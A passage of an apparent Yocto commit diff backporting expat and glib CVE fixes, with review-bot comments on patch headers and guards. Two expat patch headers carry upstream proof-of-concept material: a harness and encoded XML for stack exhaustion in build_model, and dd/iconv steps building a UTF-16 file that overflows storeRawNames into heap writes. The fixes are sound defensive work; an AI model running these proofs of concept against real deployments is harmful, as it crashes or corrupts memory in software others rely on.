99- (--stackTop)->numchildren = 0;
100+ /* Add the starting job, the root node (index 0) of the source tree */
101+ (jobDest++)->numchildren = 0;
102
103 for (; dest < destLimit; dest++) {
104- /* Pop source tree node index off the stack */
105- const int src_node = (int)(stackTop++)->numchildren;
106+ /* Retrieve source tree array index from job storage */
107+ const int src_node = (int)dest->numchildren;
108
109 /* Convert item */
110 dest->type = dtd->scaffold[src_node].type;
111@@ -7427,16 +7446,12 @@ build_model(XML_Parser parser) {
112 int cn;
113 dest->name = NULL;
114 dest->numchildren = dtd->scaffold[src_node].childcnt;
115- dest->children = &dest[1];
116+ dest->children = jobDest;
117
118- /* Push children to the stack
119- * in a way where the first child ends up at the top of the
120- * (downwards growing) stack, in order to be processed first. */
121- stackTop -= dest->numchildren;
122+ /* Append scaffold indices of children to array */
123 for (i = 0, cn = dtd->scaffold[src_node].firstchild;
124- i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib) {
125- (stackTop + i)->numchildren = (unsigned int)cn;
126- }
127+ i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib)
128+ (jobDest++)->numchildren = (unsigned int)cn;
129 }
130 }
131
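Review bot: CVE-2022-25313-regression.patch has no `Upstream-Status:`, `CVE:` or `Signed-off-by:` line in its header, unlike the other expat patches added in this commit; the header goes from `Co-authored-by:` straight to `---`. I would add the block the sibling patches carry, e.g. `Upstream-Status: Backport`, `CVE: CVE-2022-25313` and the backporter's sign-off, referencing the upstream commit named on the `From` line (b12f34fe32821a69dc12ff9a021daca0856de238). The hunks remove the `stackTop`/`stackBottom` code that CVE-2022-25313.patch introduces, so this patch must be applied after that one even though it sorts before it by file name; the recipe's SRC_URI order is not visible here and should be checked. `build_model` starts and ends outside these hunks.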
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25313.patch b/meta/recipes-core/expat/expat/CVE-2022-25313.patch
new file mode 100644
index 0000000000..470d66e9dd
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25313.patch
@@ -0,0 +1,230 @@
1From 9b4ce651b26557f16103c3a366c91934ecd439ab Mon Sep 17 00:00:00 2001
2From: Samanta Navarro <ferivoz@riseup.net>
3Date: Tue, 15 Feb 2022 11:54:29 +0000
4Subject: [PATCH] Prevent stack exhaustion in build_model
5
6It is possible to trigger stack exhaustion in build_model function if
7depth of nested children in DTD element is large enough. This happens
8because build_node is a recursively called function within build_model.
9
10The code has been adjusted to run iteratively. It uses the already
11allocated heap space as temporary stack (growing from top to bottom).
12
13Output is identical to recursive version. No new fields in data
14structures were added, i.e. it keeps full API and ABI compatibility.
15Instead the numchildren variable is used to temporarily keep the
16index of items (uint vs int).
17
18Documentation and readability improvements kindly added by Sebastian.
19
20Proof of Concept:
21
221. Compile poc binary which parses XML file line by line
23
24```
25cat > poc.c << EOF
26 #include <err.h>
27 #include <expat.h>
28 #include <stdio.h>
29
30 XML_Parser parser;
31
32 static void XMLCALL
33 dummy_element_decl_handler(void *userData, const XML_Char *name,
34 XML_Content *model) {
35 XML_FreeContentModel(parser, model);
36 }
37
38 int main(int argc, char *argv[]) {
39 FILE *fp;
40 char *p = NULL;
41 size_t s = 0;
42 ssize_t l;
43 if (argc != 2)
44 errx(1, "usage: poc poc.xml");
45 if ((parser = XML_ParserCreate(NULL)) == NULL)
46 errx(1, "XML_ParserCreate");
47 XML_SetElementDeclHandler(parser, dummy_element_decl_handler);
48 if ((fp = fopen(argv[1], "r")) == NULL)
49 err(1, "fopen");
50 while ((l = getline(&p, &s, fp)) > 0)
51 if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK)
52 errx(1, "XML_Parse");
53 XML_ParserFree(parser);
54 free(p);
55 fclose(fp);
56 return 0;
57 }
58EOF
59cc -std=c11 -D_POSIX_C_SOURCE=200809L -lexpat -o poc poc.c
60```
61
622. Create XML file with a lot of nested groups in DTD element
63
64```
65cat > poc.xml.zst.b64 << EOF
66KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA
67ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC
68ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ==
69EOF
70base64 -d poc.xml.zst.b64 | zstd -d > poc.xml
71```
72
733. Run Proof of Concept
74
75```
76./poc poc.xml
77```
78
79Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
80
81Upstream-Status: Backport
82https://github.com/libexpat/libexpat/pull/558/commits/9b4ce651b26557f16103c3a366c91934ecd439ab
83
84CVE: CVE-2022-25313
85
86Signed-off-by: Steve Sakoman <steve@sakoman.com>
87
88---
89 expat/lib/xmlparse.c | 116 +++++++++++++++++++++++++++++--------------
90 1 file changed, 79 insertions(+), 37 deletions(-)
91
92diff --git a/lib/xmlparse.c b/lib/xmlparse.c
93index 4b43e613..594cf12c 100644
94--- a/lib/xmlparse.c
95+++ b/lib/xmlparse.c
96@@ -7317,44 +7317,15 @@ nextScaffoldPart(XML_Parser parser) {
97 return next;
98 }
99
100-static void
101-build_node(XML_Parser parser, int src_node, XML_Content *dest,
102- XML_Content **contpos, XML_Char **strpos) {
103- DTD *const dtd = parser->m_dtd; /* save one level of indirection */
104- dest->type = dtd->scaffold[src_node].type;
105- dest->quant = dtd->scaffold[src_node].quant;
106- if (dest->type == XML_CTYPE_NAME) {
107- const XML_Char *src;
108- dest->name = *strpos;
109- src = dtd->scaffold[src_node].name;
110- for (;;) {
111- *(*strpos)++ = *src;
112- if (! *src)
113- break;
114- src++;
115- }
116- dest->numchildren = 0;
117- dest->children = NULL;
118- } else {
119- unsigned int i;
120- int cn;
121- dest->numchildren = dtd->scaffold[src_node].childcnt;
122- dest->children = *contpos;
123- *contpos += dest->numchildren;
124- for (i = 0, cn = dtd->scaffold[src_node].firstchild; i < dest->numchildren;
125- i++, cn = dtd->scaffold[cn].nextsib) {
126- build_node(parser, cn, &(dest->children[i]), contpos, strpos);
127- }
128- dest->name = NULL;
129- }
130-}
131-
132 static XML_Content *
133 build_model(XML_Parser parser) {
134+ /* Function build_model transforms the existing parser->m_dtd->scaffold
135+ * array of CONTENT_SCAFFOLD tree nodes into a new array of
136+ * XML_Content tree nodes followed by a gapless list of zero-terminated
137+ * strings. */
138 DTD *const dtd = parser->m_dtd; /* save one level of indirection */
139 XML_Content *ret;
140- XML_Content *cpos;
141- XML_Char *str;
142+ XML_Char *str; /* the current string writing location */
143
144 /* Detect and prevent integer overflow.
145 * The preprocessor guard addresses the "always false" warning
146@@ -7380,10 +7351,81 @@ build_model(XML_Parser parser) {
147 if (! ret)
148 return NULL;
149
150- str = (XML_Char *)(&ret[dtd->scaffCount]);
151- cpos = &ret[1];
152+ /* What follows is an iterative implementation (of what was previously done
153+ * recursively in a dedicated function called "build_node". The old recursive
154+ * build_node could be forced into stack exhaustion from input as small as a
155+ * few megabyte, and so that was a security issue. Hence, a function call
156+ * stack is avoided now by resolving recursion.)
157+ *
158+ * The iterative approach works as follows:
159+ *
160+ * - We use space in the target array for building a temporary stack structure
161+ * while that space is still unused.
162+ * The stack grows from the array's end downwards and the "actual data"
163+ * grows from the start upwards, sequentially.
164+ * (Because stack grows downwards, pushing onto the stack is a decrement
165+ * while popping off the stack is an increment.)
166+ *
167+ * - A stack element appears as a regular XML_Content node on the outside,
168+ * but only uses a single field -- numchildren -- to store the source
169+ * tree node array index. These are the breadcrumbs leading the way back
170+ * during pre-order (node first) depth-first traversal.
171+ *
172+ * - The reason we know the stack will never grow into (or overlap with)
173+ * the area with data of value at the start of the array is because
174+ * the overall number of elements to process matches the size of the array,
175+ * and the sum of fully processed nodes and yet-to-be processed nodes
176+ * on the stack, cannot be more than the total number of nodes.
177+ * It is possible for the top of the stack and the about-to-write node
178+ * to meet, but that is safe because we get the source index out
179+ * before doing any writes on that node.
180+ */
181+ XML_Content *dest = ret; /* tree node writing location, moves upwards */
182+ XML_Content *const destLimit = &ret[dtd->scaffCount];
183+ XML_Content *const stackBottom = &ret[dtd->scaffCount];
184+ XML_Content *stackTop = stackBottom; /* i.e. stack is initially empty */
185+ str = (XML_Char *)&ret[dtd->scaffCount];
186+
187+ /* Push source tree root node index onto the stack */
188+ (--stackTop)->numchildren = 0;
189+
190+ for (; dest < destLimit; dest++) {
191+ /* Pop source tree node index off the stack */
192+ const int src_node = (int)(stackTop++)->numchildren;
193+
194+ /* Convert item */
195+ dest->type = dtd->scaffold[src_node].type;
196+ dest->quant = dtd->scaffold[src_node].quant;
197+ if (dest->type == XML_CTYPE_NAME) {
198+ const XML_Char *src;
199+ dest->name = str;
200+ src = dtd->scaffold[src_node].name;
201+ for (;;) {
202+ *str++ = *src;
203+ if (! *src)
204+ break;
205+ src++;
206+ }
207+ dest->numchildren = 0;
208+ dest->children = NULL;
209+ } else {
210+ unsigned int i;
211+ int cn;
212+ dest->name = NULL;
213+ dest->numchildren = dtd->scaffold[src_node].childcnt;
214+ dest->children = &dest[1];
215+
216+ /* Push children to the stack
217+ * in a way where the first child ends up at the top of the
218+ * (downwards growing) stack, in order to be processed first. */
219+ stackTop -= dest->numchildren;
220+ for (i = 0, cn = dtd->scaffold[src_node].firstchild;
221+ i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib) {
222+ (stackTop + i)->numchildren = (unsigned int)cn;
223+ }
224+ }
225+ }
226
227- build_node(parser, 0, ret, &cpos, &str);
228 return ret;
229 }
230
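--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25314.patch
@@ -0,0 +1,32 @@
+From efcb347440ade24b9f1054671e6bd05e60b4cafd Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Tue, 15 Feb 2022 11:56:57 +0000
+Subject: [PATCH] Prevent integer overflow in copyString
+
+The copyString function is only used for encoding string supplied by
+the library user.
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/560/commits/efcb347440ade24b9f1054671e6bd05e60b4cafd
+
+CVE: CVE-2022-25314
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 4b43e613..a39377c2 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -7412,7 +7412,7 @@ getElementType(XML_Parser parser, const ENCODING *enc, const char *ptr,
+
+ static XML_Char *
+ copyString(const XML_Char *s, const XML_Memory_Handling_Suite *memsuite) {
+- int charsRequired = 0;
++ size_t charsRequired = 0;
+ XML_Char *result;
+
+ /* First determine how long the string is */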
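Review bot: The `Upstream-Status: Backport` line in this patch header puts the upstream URL on the following line instead of in brackets on the same line, unlike CVE-2022-40674.patch and CVE-2022-43680.patch in this series; CVE-2022-25315.patch has the same layout. I would write `Upstream-Status: Backport [https://github.com/libexpat/libexpat/pull/560/commits/efcb347440ade24b9f1054671e6bd05e60b4cafd]` so the status and its reference stay on one parseable line. The code change itself only widens `charsRequired` to `size_t`; the rest of copyString, including the allocation that uses the count, is outside the hunk, so whether the size computation is carried out entirely in `size_t` cannot be confirmed from here.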
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25315.patch b/meta/recipes-core/expat/expat/CVE-2022-25315.patch
new file mode 100644
index 0000000000..a39771d28a
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25315.patch
@@ -0,0 +1,145 @@
1From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001
2From: Samanta Navarro <ferivoz@riseup.net>
3Date: Tue, 15 Feb 2022 11:55:46 +0000
4Subject: [PATCH] Prevent integer overflow in storeRawNames
5
6It is possible to use an integer overflow in storeRawNames for out of
7boundary heap writes. Default configuration is affected. If compiled
8with XML_UNICODE then the attack does not work. Compiling with
9-fsanitize=address confirms the following proof of concept.
10
11The problem can be exploited by abusing the m_buffer expansion logic.
12Even though the initial size of m_buffer is a power of two, eventually
13it can end up a little bit lower, thus allowing allocations very close
14to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
15names can be parsed which are almost INT_MAX in size.
16
17Unfortunately (from an attacker point of view) INT_MAX/2 is also a
18limitation in string pools. Having a tag name of INT_MAX/2 characters
19or more is not possible.
20
21Expat can convert between different encodings. UTF-16 documents which
22contain only ASCII representable characters are twice as large as their
23ASCII encoded counter-parts.
24
25The proof of concept works by taking these three considerations into
26account:
27
281. Move the m_buffer size slightly below a power of two by having a
29 short root node <a>. This allows the m_buffer to grow very close
30 to INT_MAX.
312. The string pooling forbids tag names longer than or equal to
32 INT_MAX/2, so keep the attack tag name smaller than that.
333. To be able to still overflow INT_MAX even though the name is
34 limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
35 which only contains ASCII characters. UTF-16 always stores two
36 bytes per character while the tag name is converted to using only
37 one. Our attack node byte count must be a bit higher than
38 2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
39 in sum can overflow INT_MAX.
40
41Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
42without running into INT_MAX boundary check. The string pooling is
43able to store INT_MAX/3 as tag name because the amount is below
44INT_MAX/2 limitation. And creating the sum of both eventually overflows
45in storeRawNames.
46
47Proof of Concept:
48
491. Compile expat with -fsanitize=address.
50
512. Create Proof of Concept binary which iterates through input
52 file 16 MB at once for better performance and easier integer
53 calculations:
54
55```
56cat > poc.c << EOF
57 #include <err.h>
58 #include <expat.h>
59 #include <stdlib.h>
60 #include <stdio.h>
61
62 #define CHUNK (16 * 1024 * 1024)
63 int main(int argc, char *argv[]) {
64 XML_Parser parser;
65 FILE *fp;
66 char *buf;
67 int i;
68
69 if (argc != 2)
70 errx(1, "usage: poc file.xml");
71 if ((parser = XML_ParserCreate(NULL)) == NULL)
72 errx(1, "failed to create expat parser");
73 if ((fp = fopen(argv[1], "r")) == NULL) {
74 XML_ParserFree(parser);
75 err(1, "failed to open file");
76 }
77 if ((buf = malloc(CHUNK)) == NULL) {
78 fclose(fp);
79 XML_ParserFree(parser);
80 err(1, "failed to allocate buffer");
81 }
82 i = 0;
83 while (fread(buf, CHUNK, 1, fp) == 1) {
84 printf("iteration %d: XML_Parse returns %d\n", ++i,
85 XML_Parse(parser, buf, CHUNK, XML_FALSE));
86 }
87 free(buf);
88 fclose(fp);
89 XML_ParserFree(parser);
90 return 0;
91 }
92EOF
93gcc -fsanitize=address -lexpat -o poc poc.c
94```
95
963. Construct specially prepared UTF-16 XML file:
97
98```
99dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
100echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
101echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
102iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
103```
104
1054. Run proof of concept:
106
107```
108./poc poc-utf16.xml
109```
110
111Upstream-Status: Backport
112https://github.com/libexpat/libexpat/pull/559/commits/eb0362808b4f9f1e2345a0cf203b8cc196d776d9
113
114CVE: CVE-2022-25315
115
116Signed-off-by: Steve Sakoman <steve@sakoman.com>
117---
118 lib/xmlparse.c | 7 ++++++-
119 1 file changed, 6 insertions(+), 1 deletion(-)
120
121diff --git a/lib/xmlparse.c b/lib/xmlparse.c
122index 4b43e613..f34d6ab5 100644
123--- a/lib/xmlparse.c
124+++ b/lib/xmlparse.c
125@@ -2563,6 +2563,7 @@ storeRawNames(XML_Parser parser) {
126 while (tag) {
127 int bufSize;
128 int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
129+ size_t rawNameLen;
130 char *rawNameBuf = tag->buf + nameLen;
131 /* Stop if already stored. Since m_tagStack is a stack, we can stop
132 at the first entry that has already been copied; everything
133@@ -2574,7 +2575,11 @@ storeRawNames(XML_Parser parser) {
134 /* For re-use purposes we need to ensure that the
135 size of tag->buf is a multiple of sizeof(XML_Char).
136 */
137- bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
138+ rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
139+ /* Detect and prevent integer overflow. */
140+ if (rawNameLen > (size_t)INT_MAX - nameLen)
141+ return XML_FALSE;
142+ bufSize = nameLen + (int)rawNameLen;
143 if (bufSize > tag->bufEnd - tag->buf) {
144 char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
145 if (temp == NULL)
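Review bot: The new guard `if (rawNameLen > (size_t)INT_MAX - nameLen)` is only sound while `nameLen` is non-negative, and `nameLen` is still an `int` initialised from the `size_t` product `sizeof(XML_Char) * (tag->name.strLen + 1)` in the first hunk. If that product ever exceeded INT_MAX, the converted value would typically be negative, the unsigned subtraction would wrap, and the comparison would no longer bound the sum. The commit message says string pools cap tag names below INT_MAX/2, which probably rules this out for the default build, but the assumption deserves a line next to the check, e.g. `/* nameLen is bounded by the string pool limit, so it is non-negative here */`, or `nameLen` could be validated before use. storeRawNames starts and ends outside both hunks.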
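--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-40674.patch
@@ -0,0 +1,53 @@
+From 4a32da87e931ba54393d465bb77c40b5c33d343b Mon Sep 17 00:00:00 2001
+From: Rhodri James <rhodri@wildebeest.org.uk>
+Date: Wed, 17 Aug 2022 18:26:18 +0100
+Subject: [PATCH] Ensure raw tagnames are safe exiting internalEntityParser
+
+It is possible to concoct a situation in which parsing is
+suspended while substituting in an internal entity, so that
+XML_ResumeParser directly uses internalEntityProcessor as
+its processor. If the subsequent parse includes some unclosed
+tags, this will return without calling storeRawNames to ensure
+that the raw versions of the tag names are stored in memory other
+than the parse buffer itself. If the parse buffer is then changed
+or reallocated (for example if processing a file line by line),
+badness will ensue.
+
+This patch ensures storeRawNames is always called when needed
+after calling doContent. The earlier call do doContent does
+not need the same protection; it only deals with entity
+substitution, which cannot leave unbalanced tags, and in any
+case the raw names will be pointing into the stored entity
+value not the parse buffer.
+
+Upstream-Status: Backport [https://github.com/libexpat/libexpat/commit/4a32da87e931ba54393d465bb77c40b5c33d343b]
+CVE: CVE-2022-40674
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+---
+ expat/lib/xmlparse.c | 13 +++++++++----
+ 1 file changed, 9 insertions(+), 4 deletions(-)
+
+Index: expat/lib/xmlparse.c
+===================================================================
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -5657,10 +5657,15 @@ internalEntityProcessor(XML_Parser parse
+ {
+ parser->m_processor = contentProcessor;
+ /* see externalEntityContentProcessor vs contentProcessor */
+- return doContent(parser, parser->m_parentParser ? 1 : 0, parser->m_encoding,
+- s, end, nextPtr,
+- (XML_Bool)! parser->m_parsingStatus.finalBuffer,
+- XML_ACCOUNT_DIRECT);
++ result = doContent(parser, parser->m_parentParser ? 1 : 0,
++ parser->m_encoding, s, end, nextPtr,
++ (XML_Bool)! parser->m_parsingStatus.finalBuffer,
++ XML_ACCOUNT_DIRECT);
++ if (result == XML_ERROR_NONE) {
++ if (! storeRawNames(parser))
++ return XML_ERROR_NO_MEMORY;
++ }
++ return result;
+ }
+ }
+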
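Review bot: The added `return XML_ERROR_NO_MEMORY;` reports every storeRawNames failure as out-of-memory, but with CVE-2022-25315.patch from the same series storeRawNames also returns XML_FALSE when it rejects a length that would overflow. That is probably consistent with the other call sites, which are not visible here, yet someone debugging a rejected document will be misled by the error code. I would add a comment above the check: `/* storeRawNames fails on allocation failure and on an oversized raw name; both surface as XML_ERROR_NO_MEMORY */`. internalEntityProcessor starts outside the hunk, so the declaration of `result` is assumed to exist there.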
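--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-43680.patch
@@ -0,0 +1,33 @@
+From 5290462a7ea1278a8d5c0d5b2860d4e244f997e4 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 20 Sep 2022 02:44:34 +0200
+Subject: [PATCH] lib: Fix overeager DTD destruction in
+ XML_ExternalEntityParserCreate
+
+CVE: CVE-2022-43680
+Upstream-Status: Backport [https://github.com/libexpat/libexpat/commit/5290462a7ea1278a8d5c0d5b2860d4e244f997e4.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comments: Hunk refreshed
+---
+ lib/xmlparse.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index aacd6e7fc..57bf103cc 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -1035,6 +1035,14 @@ parserCreate(const XML_Char *encodingNam
+ parserInit(parser, encodingName);
+
+ if (encodingName && ! parser->m_protocolEncodingName) {
++ if (dtd) {
++ // We need to stop the upcoming call to XML_ParserFree from happily
++ // destroying parser->m_dtd because the DTD is shared with the parent
++ // parser and the only guard that keeps XML_ParserFree from destroying
++ // parser->m_dtd is parser->m_isParamEntity but it will be set to
++ // XML_TRUE only later in XML_ExternalEntityParserCreate (or not at all).
++ parser->m_dtd = NULL;
++ }
+ XML_ParserFree(parser);
+ return NULL;
+ }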
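Review bot: Setting `parser->m_dtd = NULL` before `XML_ParserFree(parser)` is only safe if XML_ParserFree skips DTD destruction when `m_dtd` is NULL, and that function is not part of this hunk. The added comment names `m_isParamEntity` as the only guard, so this should be confirmed against the 2.2.9 tree, especially as the header notes the hunk was refreshed; once confirmed, a line such as `/* XML_ParserFree tolerates m_dtd == NULL */` would record it. The new comment also uses `//` where the other xmlparse.c hunks on this page use `/* */`. parserCreate begins and ends outside the hunk.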
diff --git a/meta/recipes-core/expat/expat/libtool-tag.patch b/meta/recipes-core/expat/expat/libtool-tag.patch
index 0a0aed23e5..c59ccbbede 100644
--- a/meta/recipes-core/expat/expat/libtool-tag.patch
+++ b/meta/recipes-core/expat/expat/libtool-tag.patch
@@ -1,30 +1,27 @@
1From 10342e6b600858b091bc7771e454d9e06af06410 Mon Sep 17 00:00:00 2001 1From da433dbe79f2d4d5d7d79869c669594c99c5de9c Mon Sep 17 00:00:00 2001
2From: Khem Raj <raj.khem@gmail.com> 2From: Jasper Orschulko <jasper@fancydomain.eu>
3Date: Thu, 2 Nov 2017 18:20:57 +0800 3Date: Wed, 16 Jun 2021 19:00:30 +0200
4Subject: [PATCH] Add CC tag to build 4Subject: [PATCH] Add CC tag to build
5 5
6Add CC tag to build
7
8Upstream-Status: Pending 6Upstream-Status: Pending
9Signed-off-by: Khem Raj <raj.khem@gmail.com> 7Signed-off-by: Jasper Orschulko <jasper@fancydomain.eu>
10Signed-off-by: Dengke Du <dengke.du@windriver.com>
11--- 8---
12 Makefile.in | 2 +- 9 Makefile.am | 2 +-
13 1 file changed, 1 insertion(+), 1 deletion(-) 10 1 file changed, 1 insertion(+), 1 deletion(-)
14 11
15diff --git a/Makefile.in b/Makefile.in 12diff --git a/Makefile.am b/Makefile.am
16index 9560a95..d444bd6 100644 13index 5e1d37dd..f7a6dece 100644
17--- a/Makefile.in 14--- a/Makefile.am
18+++ b/Makefile.in 15+++ b/Makefile.am
19@@ -319,7 +319,7 @@ LIBCURRENT = @LIBCURRENT@ 16@@ -36,7 +36,7 @@ AUTOMAKE_OPTIONS = \
20 LIBOBJS = @LIBOBJS@ 17 subdir-objects
21 LIBREVISION = @LIBREVISION@ 18
22 LIBS = @LIBS@ 19 ACLOCAL_AMFLAGS = -I m4
23-LIBTOOL = @LIBTOOL@ 20-LIBTOOLFLAGS = --verbose
24+LIBTOOL = @LIBTOOL@ --tag CC 21+LIBTOOLFLAGS = --verbose --tag=CC
25 LIPO = @LIPO@ 22
26 LN_S = @LN_S@ 23 SUBDIRS = lib # lib goes first to build first
27 LTLIBOBJS = @LTLIBOBJS@ 24 if WITH_EXAMPLES
28-- 25--
292.7.4 262.32.0
30 27
diff --git a/meta/recipes-core/expat/expat_2.2.9.bb b/meta/recipes-core/expat/expat_2.2.9.bb
index 8f3db41352..8a5006e59a 100644
--- a/meta/recipes-core/expat/expat_2.2.9.bb
+++ b/meta/recipes-core/expat/expat_2.2.9.bb
@@ -1,22 +1,35 @@
1SUMMARY = "A stream-oriented XML parser library" 1SUMMARY = "A stream-oriented XML parser library"
2DESCRIPTION = "Expat is an XML parser library written in C. It is a stream-oriented parser in which an application registers handlers for things the parser might find in the XML document (like start tags)" 2DESCRIPTION = "Expat is an XML parser library written in C. It is a stream-oriented parser in which an application registers handlers for things the parser might find in the XML document (like start tags)"
3HOMEPAGE = "http://expat.sourceforge.net/" 3HOMEPAGE = "https://github.com/libexpat/libexpat"
4SECTION = "libs" 4SECTION = "libs"
5LICENSE = "MIT" 5LICENSE = "MIT"
6 6
7LIC_FILES_CHKSUM = "file://COPYING;md5=5b8620d98e49772d95fc1d291c26aa79" 7LIC_FILES_CHKSUM = "file://COPYING;md5=5b8620d98e49772d95fc1d291c26aa79"
8 8
9SRC_URI = "${SOURCEFORGE_MIRROR}/expat/expat-${PV}.tar.bz2 \ 9SRC_URI = "git://github.com/libexpat/libexpat.git;protocol=https;branch=master \
10 file://CVE-2013-0340.patch \
11 file://CVE-2021-45960.patch \
12 file://CVE-2021-46143.patch \
13 file://CVE-2022-22822-27.patch \
14 file://CVE-2022-23852.patch \
15 file://CVE-2022-23990.patch \
16 file://CVE-2022-25235.patch \
17 file://CVE-2022-25236.patch \
18 file://CVE-2022-25313.patch \
19 file://CVE-2022-25313-regression.patch \
20 file://CVE-2022-25314.patch \
21 file://CVE-2022-25315.patch \
10 file://libtool-tag.patch \ 22 file://libtool-tag.patch \
11 " 23 file://CVE-2022-40674.patch \
24 file://CVE-2022-43680.patch \
25 "
12 26
13SRC_URI[md5sum] = "875a2c2ff3e8eb9e5a5cd62db2033ab5" 27SRCREV = "a7bc26b69768f7fb24f0c7976fae24b157b85b13"
14SRC_URI[sha256sum] = "f1063084dc4302a427dabcca499c8312b3a32a29b7d2506653ecc8f950a9a237"
15 28
16inherit autotools lib_package 29inherit autotools lib_package
17 30
18do_configure_prepend () { 31S = "${WORKDIR}/git/expat"
19 rm -f ${S}/conftools/libtool.m4
20}
21 32
22BBCLASSEXTEND = "native nativesdk" 33BBCLASSEXTEND = "native nativesdk"
34
35CVE_PRODUCT = "expat libexpat"
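Review bot: With `SRC_URI[md5sum]` and `SRC_URI[sha256sum]` removed, the pinned `SRCREV` is the only integrity anchor for the source, and nothing in the recipe says which upstream release that commit is. PV is still 2.2.9, so I would add a comment above it such as `# SRCREV is the commit of the upstream 2.2.9 release tag`, after verifying that against the upstream repository. It would also read better if `file://libtool-tag.patch` were not listed in the middle of the CVE patches, assuming the series applies in either order.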
diff --git a/meta/recipes-core/fts/fts_1.2.7.bb b/meta/recipes-core/fts/fts_1.2.7.bb
index 589ae0e916..d3b0f31eda 100644
--- a/meta/recipes-core/fts/fts_1.2.7.bb
+++ b/meta/recipes-core/fts/fts_1.2.7.bb
@@ -3,13 +3,14 @@
3 3
4SUMMARY = "Implementation of ftsfor musl libc packages" 4SUMMARY = "Implementation of ftsfor musl libc packages"
5HOMEPAGE = "https://github.com/pullmoll/musl-fts" 5HOMEPAGE = "https://github.com/pullmoll/musl-fts"
6DESCRIPTION = "The musl-fts package implements the fts(3) functions fts_open, fts_read, fts_children, fts_set and fts_close, which are missing in musl libc."
6LICENSE = "BSD-3-Clause" 7LICENSE = "BSD-3-Clause"
7LIC_FILES_CHKSUM = "file://COPYING;md5=5ffe358174aad383f1b69ce3b53da982" 8LIC_FILES_CHKSUM = "file://COPYING;md5=5ffe358174aad383f1b69ce3b53da982"
8SECTION = "libs" 9SECTION = "libs"
9 10
10SRCREV = "0bde52df588e8969879a2cae51c3a4774ec62472" 11SRCREV = "0bde52df588e8969879a2cae51c3a4774ec62472"
11 12
12SRC_URI = "git://github.com/pullmoll/musl-fts.git" 13SRC_URI = "git://github.com/pullmoll/musl-fts.git;branch=master;protocol=https"
13 14
14S = "${WORKDIR}/git" 15S = "${WORKDIR}/git"
15 16
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch
new file mode 100644
index 0000000000..6257763d8d
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch
@@ -0,0 +1,129 @@
1Backport of:
2
3From 0f384c88a241bbbd884487b1c40b7b75f1e638d3 Mon Sep 17 00:00:00 2001
4From: Krzesimir Nowak <qdlacz@gmail.com>
5Date: Wed, 10 Feb 2021 23:51:07 +0100
6Subject: [PATCH] gbytearray: Do not accept too large byte arrays
7
8GByteArray uses guint for storing the length of the byte array, but it
9also has a constructor (g_byte_array_new_take) that takes length as a
10gsize. gsize may be larger than guint (64 bits for gsize vs 32 bits
11for guint). It is possible to call the function with a value greater
12than G_MAXUINT, which will result in silent length truncation. This
13may happen as a result of unreffing GBytes into GByteArray, so rather
14be loud about it.
15
16(Test case tweaked by Philip Withnall.)
17
18(Backport 2.66: Add #include gstrfuncsprivate.h in the test case for
19`g_memdup2()`.)
20
21Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
22CVE: CVE-2021-27218
23Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
24Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
25
26---
27 glib/garray.c | 6 ++++++
28 glib/gbytes.c | 4 ++++
29 glib/tests/bytes.c | 35 ++++++++++++++++++++++++++++++++++-
30 3 files changed, 44 insertions(+), 1 deletion(-)
31
32--- a/glib/garray.c
33+++ b/glib/garray.c
34@@ -2234,6 +2234,10 @@ g_byte_array_steal (GByteArray *array,
